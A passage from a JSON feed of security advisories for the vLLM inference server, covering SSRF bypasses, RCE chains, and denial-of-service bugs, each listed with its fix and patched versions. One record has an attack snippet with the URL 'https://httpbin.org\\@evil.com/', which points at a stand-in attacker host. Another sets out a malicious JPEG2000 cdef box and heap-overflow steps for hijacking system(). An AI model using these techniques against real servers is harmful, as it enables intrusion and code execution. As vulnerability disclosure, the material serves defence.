in.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-03-27T15:27:20.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-7972-pg2x-xr59","https://nvd.nist.gov/vuln/detail/CVE-2026-27893","https://github.com/vllm-project/vllm/pull/36192","https://github.com/vllm-project/vllm/commit/00bd08edeee5dd4d4c13277c0114a464011acf72","https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-27893.json","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-2297.yaml","https://bugzilla.redhat.com/show_bug.cgi?id=2452055","https://access.redhat.com/security/cve/CVE-2026-27893","https://access.redhat.com/errata/RHSA-2026:8748","https://access.redhat.com/errata/RHSA-2026:8747","https://access.redhat.com/errata/RHSA-2026:8746","https://access.redhat.com/errata/RHSA-2026:37275","https://access.redhat.com/errata/RHSA-2026:24977","https://access.redhat.com/errata/RHSA-2026:19725","https://access.redhat.com/errata/RHSA-2026:19724","https://access.redhat.com/errata/RHSA-2026:19712","https://access.redhat.com/errata/RHSA-2026:10141","https://access.redhat.com/errata/RHSA-2026:10140","https://github.com/advisories/GHSA-7972-pg2x-xr59"],"source_kind":"github","identifiers":["GHSA-7972-pg2x-xr59","CVE-2026-27893"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-03-27T16:00:09.744Z","updated_at":"2026-09-25T12:04:57.652Z","epss_percentage":0.01808,"epss_percentile":0.7763099999999999,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03OTcyLXBnMngteHI1Oc4ABUXs","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03OTcyLXBnMngteHI1Oc4ABUXs","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.18.0","vulnerable_version_range":"\u003e= 0.10.1, \u003c 0.18.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03OTcyLXBnMngteHI1Oc4ABUXs/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12MzU5LWpqMnYtajUzNs4ABTW2","url":"https://github.com/advisories/GHSA-v359-jj2v-j536","title":"vLLM has SSRF Protection Bypass","description":"## Summary\n\nThe SSRF protection fix for https://github.com/vllm-project/vllm/security/advisories/GHSA-qh4c-xf7m-gxfc can be bypassed in the `load_from_url_async` method due to inconsistent URL parsing behavior between the validation layer and the actual HTTP client.\n\n## Affected Component\n\n- **File**: `vllm/connections.py`\n- **Function**: `load_from_url_async`\n\n## Vulnerability Details\n\n### Root Cause\n\nThe SSRF [fix](https://github.com/vllm-project/vllm/pull/32746) uses `urllib3.util.parse_url()` to validate and extract the hostname from user-provided URLs. However, `load_from_url_async` uses `aiohttp` for making the actual HTTP requests, and `aiohttp` internally uses the `yarl` library for URL parsing.\n\nThese two URL parsers handle backslash characters (`\\`) differently:\n\n| Parser | Input URL | Parsed Host | Parsed Path | Behavior |\n|--------|-----------|-------------|-------------|----------|\n| `urllib3.parse_url()` | `https://httpbin.org\\@evil.com/` | `httpbin.org` | `/%5C@evil.com/` | URL-encodes `\\` as `%5C`, treats `\\@evil.com/` as part of the path |\n| `yarl` (via aiohttp) | `https://httpbin.org\\@evil.com/` | `evil.com` | `/` | Treats `\\` as part of userinfo (`user: httpbin.org\\`), the `@` acts as the userinfo/host separator |\n\n### Attack Scenario\n\n```python\n# Attacker provides this URL\nmalicious_url = \"https://httpbin.org\\\\@evil.com/\"\n\n# 1. Validation layer (urllib3.parse_url)\nparsed = urllib3.util.parse_url(malicious_url)\n# parsed.host == \"httpbin.org\"  ✅ Passes validation\n\n# 2. Actual request (aiohttp with yarl)\nasync with aiohttp.ClientSession() as session:\n    async with session.get(malicious_url) as response:\n        # Request actually goes to evil.com!  ❌ Bypass!\n```\n\n### Why This Happens\n\n1. **yarl**: Interprets `httpbin.org\\` as the userinfo component, and `@` as the userinfo/host separator, so the URL is parsed as `user=httpbin.org\\`, `host=evil.com`, `path=/`\n2. **urllib3**: URL-encodes the backslash as `%5C`, so `\\@evil.com/` becomes `/%5C@evil.com/` which is treated as part of the path, leaving `host=httpbin.org`\n\nThis inconsistency allows an attacker to:\n- Bypass the hostname allowlist check\n- Access arbitrary internal/external services\n- Perform full SSRF attacks\n\n## Fixes\n\n- https://github.com/vllm-project/vllm/pull/34743","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-03-09T19:55:32.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.4,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-qh4c-xf7m-gxfc","https://github.com/vllm-project/vllm/security/advisories/GHSA-v359-jj2v-j536","https://github.com/vllm-project/vllm/pull/34743","https://github.com/vllm-project/vllm/commit/6f3b2047abd4a748e3db4a68543f8221358002c0","https://nvd.nist.gov/vuln/detail/CVE-2026-25960","https://access.redhat.com/errata/RHSA-2026:24977","https://access.redhat.com/security/cve/CVE-2026-25960","https://bugzilla.redhat.com/show_bug.cgi?id=2445892","https://github.com/advisories/GHSA-v359-jj2v-j536","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-3411.yaml","https://github.com/vllm-project/vllm","https://pypi.org/project/vllm","https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-25960.json"],"source_kind":"github","identifiers":["GHSA-v359-jj2v-j536","CVE-2026-25960"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-03-09T20:00:10.874Z","updated_at":"2026-09-25T12:05:32.244Z","epss_percentage":0.00718,"epss_percentile":0.51794,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12MzU5LWpqMnYtajUzNs4ABTW2","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12MzU5LWpqMnYtajUzNs4ABTW2","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.17.0","vulnerable_version_range":"\u003e= 0.15.1, \u003c 0.17.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12MzU5LWpqMnYtajUzNs4ABTW2/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS00cjJ4LXhwanItN2N2ds4ABRzJ","url":"https://github.com/advisories/GHSA-4r2x-xpjr-7cvv","title":"vLLM has RCE In Video Processing","description":"## Summary\n\n**A chain of vulnerabilities in vLLM allow Remote Code Execution (RCE):**\n\n1. **Info Leak** - PIL error messages expose memory addresses, bypassing ASLR\n2. **Heap Overflow** - JPEG2000 decoder in OpenCV/FFmpeg has a heap overflow that lets us hijack code execution\n\n**Result:** Send a malicious video URL to vLLM Completions or Invocations **for a video model** -\u003e Execute arbitrary commands on the server\n\nCompletely default vLLM instance directly from pip, or docker, does not have authentication so \"None\" privileges are required, but even with non-default api-key enabled configuration this exploit is feasible through invocations route that allows payload to execute pre-auth. \n\nExample heap target is provided, other heap targets can be exploited as well to achieve rce. Leak allows for simple ASLR bypass. Leak + heap overflow achieves RCE on versions prior to 0.14.1. \n\nDeployments not serving a video model are not affected.\n\n---\n\n\n## 1. Vulnerability Overview\n\n### 1.1 The Bug: JPEG2000 cdef Box Heap Overflow\nThe JPEG2000 decoder used by OpenCV (cv2) honors a `cdef` box that can remap color channels. When Y (luma) is mapped into the U (chroma) plane buffer, the decoder writes a large Y plane into the smaller U buffer, causing a heap overflow.\n\n**Root Cause**\n- `cdef` allows channel remapping (e.g., Y→U, U→Y).\n- Y plane size: `W×H`; U plane size: `(W/2)×(H/2)`.\n- Overflow size = `W×H - (W/2×H/2)` = `0.75 × W × H` bytes.\n\n**Example (150×64)**\n- Y plane: 150×64 = 9,600 bytes  \n- U plane: 75×32 = 2,400 bytes  \n- Overflow: 7,200 bytes past the U buffer\n\n### 1.2 Malicious cdef Box\n```\nOffset  Size  Field           Value\n0       4     Box Length      0x00000016 (22 bytes)\n4       4     Box Type        'cdef'\n8       2     N (channels)    0x0003\n10      2     Channel 0 Cn    0x0000 (Y channel)\n12      2     Channel 0 Typ   0x0000 (color)\n14      2     Channel 0 Asoc  0x0002 (→ maps Y into U plane)\n16      2     Channel 1 Cn    0x0001 (U channel)\n18      2     Channel 1 Typ   0x0000 (color)\n20      2     Channel 1 Asoc  0x0001 (→ maps U into Y plane)\n22      2     Channel 2 Cn    0x0002 (V channel)\n24      2     Channel 2 Typ   0x0000 (color)\n26      2     Channel 2 Asoc  0x0003 (→ maps V plane)\n```\nKey control: `Asoc=2` for channel 0 forces Y data into the U buffer, triggering the overflow.\n\n---\n\n## Vulnerable Code Chain\n\n### 1) Entry: vLLM accepts a remote `video_url` and downloads raw bytes\n\nvLLM’s OpenAI-compatible API supports a `video_url` content part:\n\n```python\nclass VideoURL(TypedDict, total=False):\n    url: Required[str]\n\nclass ChatCompletionContentPartVideoParam(TypedDict, total=False):\n    video_url: Required[VideoURL]\n    type: Required[Literal[\"video_url\"]]\n```\n\nSource: `src/vllm/entrypoints/chat_utils.py`.\n\nWhen the URL is HTTP(S), vLLM downloads it as **raw bytes** and passes the bytes into the modality loader:\n\n```python\nif url_spec.scheme.startswith(\"http\"):\n    data = connection.get_bytes(url, timeout=fetch_timeout, allow_redirects=...)\n    return media_io.load_bytes(data)\n```\n\nSource: `src/vllm/multimodal/utils.py` (`MediaConnector.load_from_url`).\n\n---\n\n### 2) Decode: vLLM uses OpenCV (cv2) VideoCapture on an in-memory byte stream\n\nThe default video backend is OpenCV, and it constructs `cv2.VideoCapture` over a `BytesIO` buffer containing the downloaded bytes:\n\n```python\nbackend = cls().get_cv2_video_api()\ncap = cv2.VideoCapture(BytesIO(data), backend, [])\nif not cap.isOpened():\n    raise ValueError(\"Could not open video stream\")\n```\n\nSource: `src/vllm/multimodal/video.py` (`OpenCVVideoBackend.load_bytes`).\n\nThe backend is selected from OpenCV’s stream-buffered backends registry:\n\n```python\nimport cv2.videoio_registry as vr\nfor backend in vr.getStreamBufferedBackends():\n    if vr.hasBackend(backend) and ...:\n        api_pref = backend\n        break\nreturn api_pref\n```\n\nSource: `src/vllm/multimodal/video.py` (`OpenCVVideoBackend.get_cv2_video_api`).\n\n**Implication**: vLLM is delegating container parsing + codec decode to OpenCV’s Video I/O stack (which, in typical builds, is backed by FFmpeg for MOV/MP4 and codecs like JPEG2000).\n\n---\n\n### 3) The actual overflow: Y (full-res) written into U (quarter-res)\n\nWhen the decoder honors the remap and writes Y into the U-plane buffer, it writes **too many bytes**:\n\n- Y plane bytes: \\(W \\times H\\)\n- U plane bytes: \\((W/2) \\times (H/2)\\)\n- Overflow bytes: \\(W \\times H - (W/2 \\times H/2) = 0.75 \\times W \\times H\\)\n\nConcrete example tried (150×64):\n\n- **Y**: \\(150 \\times 64 = 9600\\) bytes  \n- **U**: \\(75 \\times 32 = 2400\\) bytes  \n- **Overflow**: \\(9600 - 2400 = 7200\\) bytes past the end of the U allocation\n\nThis is a **heap buffer overflow** into whatever allocations follow the U-plane buffer in the decoder’s heap layout (structures, metadata, other buffers, etc.). The exact victims depend on build + runtime allocator layout.\n\n---\n\n## The Exploit Chain \n\n### Vuln 1: PIL BytesIO Address Leak (ASLR Bypass)\n\nWhen you send an **invalid image** to vLLM's multimodal endpoint, PIL throws an error like:\n\n```\ncannot identify image file \u003c_io.BytesIO object at 0x7a95e299e750\u003e\n                                                   ^^^^^^^^^^^^^^^^\n                                                   LEAKED ADDRESS!\n```\n\nvLLM returns this error to the client, **leaking a heap address**. This address is ~10.33 GB before `libc` in memory. With this leak, we reduce ASLR from **4 billion guesses to ~8 guesses**.\n\n### Vuln 2: JPEG2000 cdef Heap Overflow (RCE)\n\nvLLM uses **OpenCV (cv2)** to decode videos. OpenCV bundles **FFmpeg 5.1.x** which has a heap overflow in the JPEG2000 decoder. The OpenCV is used for video decoding so if we build a video from JPEG2000 frames it will reach the vuln:\n\n```\nvLLM API Request to Completions/Invocation\n     ↓\nOpenCV cv2.VideoCapture()\n     ↓\nFFmpeg 5.1 (bundled in OpenCV)\n     ↓\nJPEG2000 decoder (libopenjp2)\n     ↓\nHEAP OVERFLOW via malicious \"cdef\" box\n     ↓\nOverwrite function pointer → RCE!\n```\n\n**How the overflow works:**\n- JPEG2000 has a `cdef` box that remaps color channels\n- We remap Y (luma) into the U (chroma) buffer\n- Y plane = 9,600 bytes, U plane = 2,400 bytes\n- On small geometry like 150x64 pixel image we get **7,200 bytes overflow** past the U buffer. We can grow that exponentially by making bigger images. \n- This overwrites an `AVBuffer` structure containing a `free()` function pointer. This could be any function pointer or other targets. \n- We set `free = system()` and `opaque = \"command string\"`\n- When the buffer is freed → `system(\"our command\")` executes\n\n---\n\n## vLLM Attack Surface\n\n### Affected Endpoints\n\nBoth multimodal endpoints are vulnerable:\n\n```\nPOST /v1/chat/completions     (with video_url in content)\nPOST /v1/invocations          (with video_url in content)\n```\n\n### Request Flow\n\n```\n1. Attacker sends request with video_url pointing to malicious .mov file\n2. vLLM fetches the video from the URL\n3. vLLM passes video bytes to cv2.VideoCapture()\n4. OpenCV's bundled FFmpeg decodes JPEG2000 frames\n5. Malicious cdef box triggers heap overflow\n6. AVBuffer.free pointer overwritten with system()\n7. When buffer is released → system(\"attacker command\") executes\n```\n\n---\n\n## Versions Affected\n\n| Component | Version | Notes |\n|-----------|---------|-------|\n| vLLM | \u003e= 0.8.3, \u003c 0.14.1 | Default config vulnerable when serving a video model |\n| OpenCV (cv2) | 4.x with FFmpeg bundle | Bundled FFmpeg is vulnerable |\n| FFmpeg | 5.1.x (bundled) | JPEG2000 cdef overflow |\n| libopenjp2 | 2.x | Honors malicious cdef box |\n\n---\n\n## Fixes\n\n* https://github.com/vllm-project/vllm/pull/31987\n* https://github.com/vllm-project/vllm/pull/32319\n* https://github.com/vllm-project/vllm/pull/32668","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2026-02-02T17:43:45.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-4r2x-xpjr-7cvv","https://nvd.nist.gov/vuln/detail/CVE-2026-22778","https://github.com/vllm-project/vllm/pull/31987","https://github.com/vllm-project/vllm/pull/32319","https://github.com/vllm-project/vllm/releases/tag/v0.14.1","https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-22778.json","https://pypi.org/project/vllm","https://github.com/vllm-project/vllm","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-565.yaml","https://github.com/advisories/GHSA-4r2x-xpjr-7cvv","https://bugzilla.redhat.com/show_bug.cgi?id=2436113","https://access.redhat.com/security/cve/CVE-2026-22778","https://access.redhat.com/errata/RHSA-2026:3782","https://access.redhat.com/errata/RHSA-2026:3713","https://access.redhat.com/errata/RHSA-2026:3462","https://access.redhat.com/errata/RHSA-2026:3461","https://access.redhat.com/errata/RHSA-2026:30089","https://access.redhat.com/errata/RHSA-2026:30088","https://access.redhat.com/errata/RHSA-2026:30087","https://access.redhat.com/errata/RHSA-2026:19712"],"source_kind":"github","identifiers":["GHSA-4r2x-xpjr-7cvv","CVE-2026-22778"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-02-02T18:00:08.513Z","updated_at":"2026-10-02T15:05:52.638Z","epss_percentage":0.1116,"epss_percentile":0.95818,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00cjJ4LXhwanItN2N2ds4ABRzJ","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS00cjJ4LXhwanItN2N2ds4ABRzJ","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.14.1","vulnerable_version_range":"\u003e= 0.8.3, \u003c 0.14.1"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00cjJ4LXhwanItN2N2ds4ABRzJ/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1xaDRjLXhmN20tZ3hmY84ABRrE","url":"https://github.com/advisories/GHSA-qh4c-xf7m-gxfc","title":"vLLM vulnerable to Server-Side Request Forgery (SSRF) through MediaConnector","description":"### Summary\nA Server-Side Request Forgery (SSRF) vulnerability exists in the `MediaConnector` class within the vLLM project's multimodal feature set. The load_from_url and load_from_url_async methods obtain and process media from URLs provided by users, using different Python parsing libraries when restricting the target host. These two parsing libraries have different interpretations of backslashes, which allows the host name restriction to be bypassed. This allows an attacker to coerce the vLLM server into making arbitrary requests to internal network resources.\n\nThis vulnerability is particularly critical in containerized environments like `llm-d`, where a compromised vLLM pod could be used to scan the internal network, interact with other pods, and potentially cause Denial of Service or access sensitive data. For example, an attacker could make the vLLM pod send malicious requests to an internal `llm-d` management endpoint, leading to system instability by falsely reporting metrics like the KV cache state.\n\n### Details\nThe core of the vulnerability lies in the `MediaConnector.load_from_url` method and its asynchronous counterpart. These methods accept a URL string to fetch media content (images, audio, video).\n\n\u003e     def load_from_url(\n\u003e         self,\n\u003e         url: str,\n\u003e         media_io: MediaIO[_M],\n\u003e         *,\n\u003e         fetch_timeout: int | None = None,\n\u003e     ) -\u003e _M:  # type: ignore[type-var]\n\u003e         url_spec = urlparse(url)\n\u003e \n\u003e         if url_spec.scheme.startswith(\"http\"):\n\u003e             self._assert_url_in_allowed_media_domains(url_spec)\n\u003e \n\u003e             connection = self.connection\n\u003e             data = connection.get_bytes(\n\u003e                 url,\n\u003e                 timeout=fetch_timeout,\n\u003e                 allow_redirects=envs.VLLM_MEDIA_URL_ALLOW_REDIRECTS,\n\u003e             )\n\u003e \n\u003e             return media_io.load_bytes(data)\n\nThe URL validation uses the `urlparse` function from Python's `urllib` module, while the request is made using the `request` function from Python's `requests` module. The `requests` module's underlying URL parsing is implemented using the `parse_url` function from Python's `urllib3`. These two parsing functions follow different URL specifications; one is implemented according to the RFC 3986 specification, and the other is implemented according to the WHATWG Living Standard. There is a difference in how the two functions handle backslashes (`\\`) in URLs, which allows the hostname restriction to be bypassed.\n\n### Fix\n\n* https://github.com/vllm-project/vllm/pull/32746","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-01-28T16:14:28.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.1,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-qh4c-xf7m-gxfc","https://nvd.nist.gov/vuln/detail/CVE-2026-24779","https://github.com/vllm-project/vllm/pull/32746","https://github.com/vllm-project/vllm/commit/f46d576c54fb8aeec5fc70560e850bed38ef17d7","https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-24779.json","https://pypi.org/project/vllm","https://github.com/vllm-project/vllm","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-2020.yaml","https://github.com/advisories/GHSA-qh4c-xf7m-gxfc","https://bugzilla.redhat.com/show_bug.cgi?id=2433624","https://access.redhat.com/security/cve/CVE-2026-24779","https://access.redhat.com/errata/RHSA-2026:3782","https://access.redhat.com/errata/RHSA-2026:3462","https://access.redhat.com/errata/RHSA-2026:3461","https://access.redhat.com/errata/RHSA-2026:30089","https://access.redhat.com/errata/RHSA-2026:30088","https://access.redhat.com/errata/RHSA-2026:30087","https://access.redhat.com/errata/RHSA-2026:19712","https://access.redhat.com/errata/RHSA-2026:10184","https://access.redhat.com/errata/RHSA-2026:42644"],"source_kind":"github","identifiers":["GHSA-qh4c-xf7m-gxfc","CVE-2026-24779"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-01-28T17:00:08.400Z","updated_at":"2026-09-25T12:06:12.215Z","epss_percentage":0.00588,"epss_percentile":0.45752,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xaDRjLXhmN20tZ3hmY84ABRrE","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1xaDRjLXhmN20tZ3hmY84ABRrE","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.14.1","vulnerable_version_range":"\u003c 0.14.1"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xaDRjLXhmN20tZ3hmY84ABRrE/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0ycGM5LTRqODMtcWptcs4ABRWE","url":"https://github.com/advisories/GHSA-2pc9-4j83-qjmr","title":"vLLM affected by RCE via auto_map dynamic module loading during model initialization","description":"# Summary\n\nvLLM loads Hugging Face `auto_map` dynamic modules during model resolution **without gating on `trust_remote_code`**, allowing attacker-controlled Python code in a model repo/path to execute at server startup.\n\n---\n\n# Impact\n\nAn attacker who can influence the model repo/path (local directory or remote Hugging Face repo) can achieve **arbitrary code execution** on the vLLM host during model load.  \nThis happens **before any request handling** and does **not require API access**.\n\n---\n\n# Affected Versions\n\nAll versions where `vllm/model_executor/models/registry.py` resolves `auto_map` entries with `try_get_class_from_dynamic_module` **without checking `trust_remote_code`** (at least current `main`).\n\n---\n\n# Details\n\nDuring model resolution, vLLM unconditionally iterates `auto_map` entries from the model config and calls `try_get_class_from_dynamic_module`, which delegates to Transformers’ `get_class_from_dynamic_module` and **executes the module code**.\n\nThis occurs even when `trust_remote_code` is `false`, allowing a malicious model repo to embed code in a referenced module and have it executed during initialization.\n\n### Relevant code\n\n- `vllm/model_executor/models/registry.py:856` — auto_map resolution  \n- `vllm/transformers_utils/dynamic_module.py:13` — delegates to `get_class_from_dynamic_module`, which executes code\n\n---\n\n# Fixes\n\n* https://github.com/vllm-project/vllm/pull/32194\n\n# Credits\n\nReported by **bugbunny.ai**","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-01-21T16:12:54.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-2pc9-4j83-qjmr","https://github.com/vllm-project/vllm/pull/32194","https://github.com/vllm-project/vllm/commit/78d13ea9de4b1ce5e4d8a5af9738fea71fb024e5","https://github.com/vllm-project/vllm/releases/tag/v0.14.0","https://nvd.nist.gov/vuln/detail/CVE-2026-22807","https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-22807.json","https://pypi.org/project/vllm","https://github.com/vllm-project/vllm","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-2010.yaml","https://github.com/advisories/GHSA-2pc9-4j83-qjmr","https://bugzilla.redhat.com/show_bug.cgi?id=2431865","https://access.redhat.com/security/cve/CVE-2026-22807","https://access.redhat.com/errata/RHSA-2026:5119","https://access.redhat.com/errata/RHSA-2026:3782","https://access.redhat.com/errata/RHSA-2026:3713","https://access.redhat.com/errata/RHSA-2026:3462","https://access.redhat.com/errata/RHSA-2026:3461","https://access.redhat.com/errata/RHSA-2026:30089","https://access.redhat.com/errata/RHSA-2026:30088","https://access.redhat.com/errata/RHSA-2026:30087","https://access.redhat.com/errata/RHSA-2026:10184","https://access.redhat.com/errata/RHSA-2026:42644"],"source_kind":"github","identifiers":["GHSA-2pc9-4j83-qjmr","CVE-2026-22807"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-01-21T17:00:07.141Z","updated_at":"2026-09-23T15:06:10.563Z","epss_percentage":0.0083,"epss_percentile":0.55962,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0ycGM5LTRqODMtcWptcs4ABRWE","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0ycGM5LTRqODMtcWptcs4ABRWE","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.14.0","vulnerable_version_range":"\u003e= 0.10.1, \u003c 0.14.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0ycGM5LTRqODMtcWptcs4ABRWE/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1ncmcyLTYzZnctZjJxcs4ABRBy","url":"https://github.com/advisories/GHSA-grg2-63fw-f2qr","title":"vLLM is vulnerable to DoS in Idefics3 vision models via image payload with ambiguous dimensions","description":"### Summary\nUsers can crash the vLLM engine serving multimodal models that use the _Idefics3_ vision model implementation by sending a specially crafted 1x1 pixel image. This causes a tensor dimension mismatch that results in an unhandled runtime error, leading to complete server termination.\n\n### Details\nThe vulnerability is triggered when the image processor encounters a 1x1 pixel image with shape (1, 1, 3) in HWC (Height, Width, Channel) format. Due to the ambiguous dimensions, the processor incorrectly assumes the image is in CHW (Channel, Height, Width) format with shape (3, H, W). This misinterpretation causes an incorrect calculation of the number of image patches, resulting in a fatal tensor split operation failure.\n\n**Crash location**: `vllm/model_executor/models/idefics3.py` line 672:\n```python\ndef _process_image_input(self, image_input: ImageInputs) -\u003e torch.Tensor | list[torch.Tensor]:\n    # ...\n    num_patches = image_input[\"num_patches\"]\n    return [e.flatten(0, 1) for e in image_features.split(num_patches.tolist())]\n```\n\nThe `split()` call fails because the computed `num_patches` value (17) does not match the actual tensor dimension (9):\n```\nRuntimeError: split_with_sizes expects split_sizes to sum exactly to 9 \n(input tensor's size at dimension 0), but got split_sizes=[17]\n```\n\nThis unhandled exception terminates the EngineCore process, crashing the server.\n\n#### Affected Models\nAny model using the Idefics3 architecture. The vulnerability was tested with `HuggingFaceTB/SmolVLM-Instruct`.\n\n### Impact\nDenial of service by crashing the engine\n\n### Mitigation\nValidating the input:\n```python\ndef _validate_image_dimensions(self, image_shape):\n    h, w = image_shape[:2] if len(image_shape) == 3 else image_shape\n    if h \u003c MIN_IMAGE_SIZE or w \u003c MIN_IMAGE_SIZE:\n        raise ValueError(f\"Image dimensions too small: {h}x{w}\")\n```\n\nManaging the exception:\n```python\ntry:\n    return [e.flatten(0, 1) for e in image_features.split(num_patches.tolist())]\nexcept RuntimeError as e:\n    logger.error(f\"Image processing failed: {e}\")\n    raise InvalidImageError(\"Failed to process image features\") from e\n```\n\n### Fixes\n\n* https://github.com/vllm-project/vllm/pull/29881","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-01-13T18:44:15.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-grg2-63fw-f2qr","https://nvd.nist.gov/vuln/detail/CVE-2026-22773","https://github.com/vllm-project/vllm/pull/29881","https://github.com/vllm-project/vllm/commit/0ec84221718d920c3f46da879cc354f94b8fb59e","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-143.yaml","https://github.com/advisories/GHSA-grg2-63fw-f2qr"],"source_kind":"github","identifiers":["GHSA-grg2-63fw-f2qr","CVE-2026-22773"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-01-13T19:00:07.569Z","updated_at":"2026-09-30T09:06:00.172Z","epss_percentage":0.00449,"epss_percentile":0.36513,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ncmcyLTYzZnctZjJxcs4ABRBy","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1ncmcyLTYzZnctZjJxcs4ABRBy","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.12.0","vulnerable_version_range":"\u003e= 0.6.4, \u003c 0.12.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ncmcyLTYzZnctZjJxcs4ABRBy/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1tY21jLTJtNTUtajhqas4ABQ31","url":"https://github.com/advisories/GHSA-mcmc-2m55-j8jj","title":"vLLM introduced enhanced protection for CVE-2025-62164","description":"### Summary\nThe fix [here](https://github.com/vllm-project/vllm/pull/27204) for CVE-2025-62164 is not sufficient. The fix only disables prompt embeds by default rather than addressing the root cause, so the DoS vulnerability remains when the feature is enabled.\n\n### Details\nvLLM's pending change attempts to fix the root cause, which is the missing sparse tensor validation.  PyTorch (~v2.0) disables sparse tensor validation (specifically, sparse tensor invariants checks) by default for performance reasons.  vLLM is adding the sparse tensor validation to ensure indices are valid, non-negative, and within bounds.  These checks help catch malformed tensors.\n\n### PoC\nNA\n\n### Impact\nCurrent fix only added a flag to disable/enable prompt embeds, so by default, prompt embeds feature is disabled in vLLM, which stops DoS attacks through the embeddings.  However, It doesn’t address the problem when the flag is enabled and there is still potential for DoS attacks.\n\n### Changes\n\n* 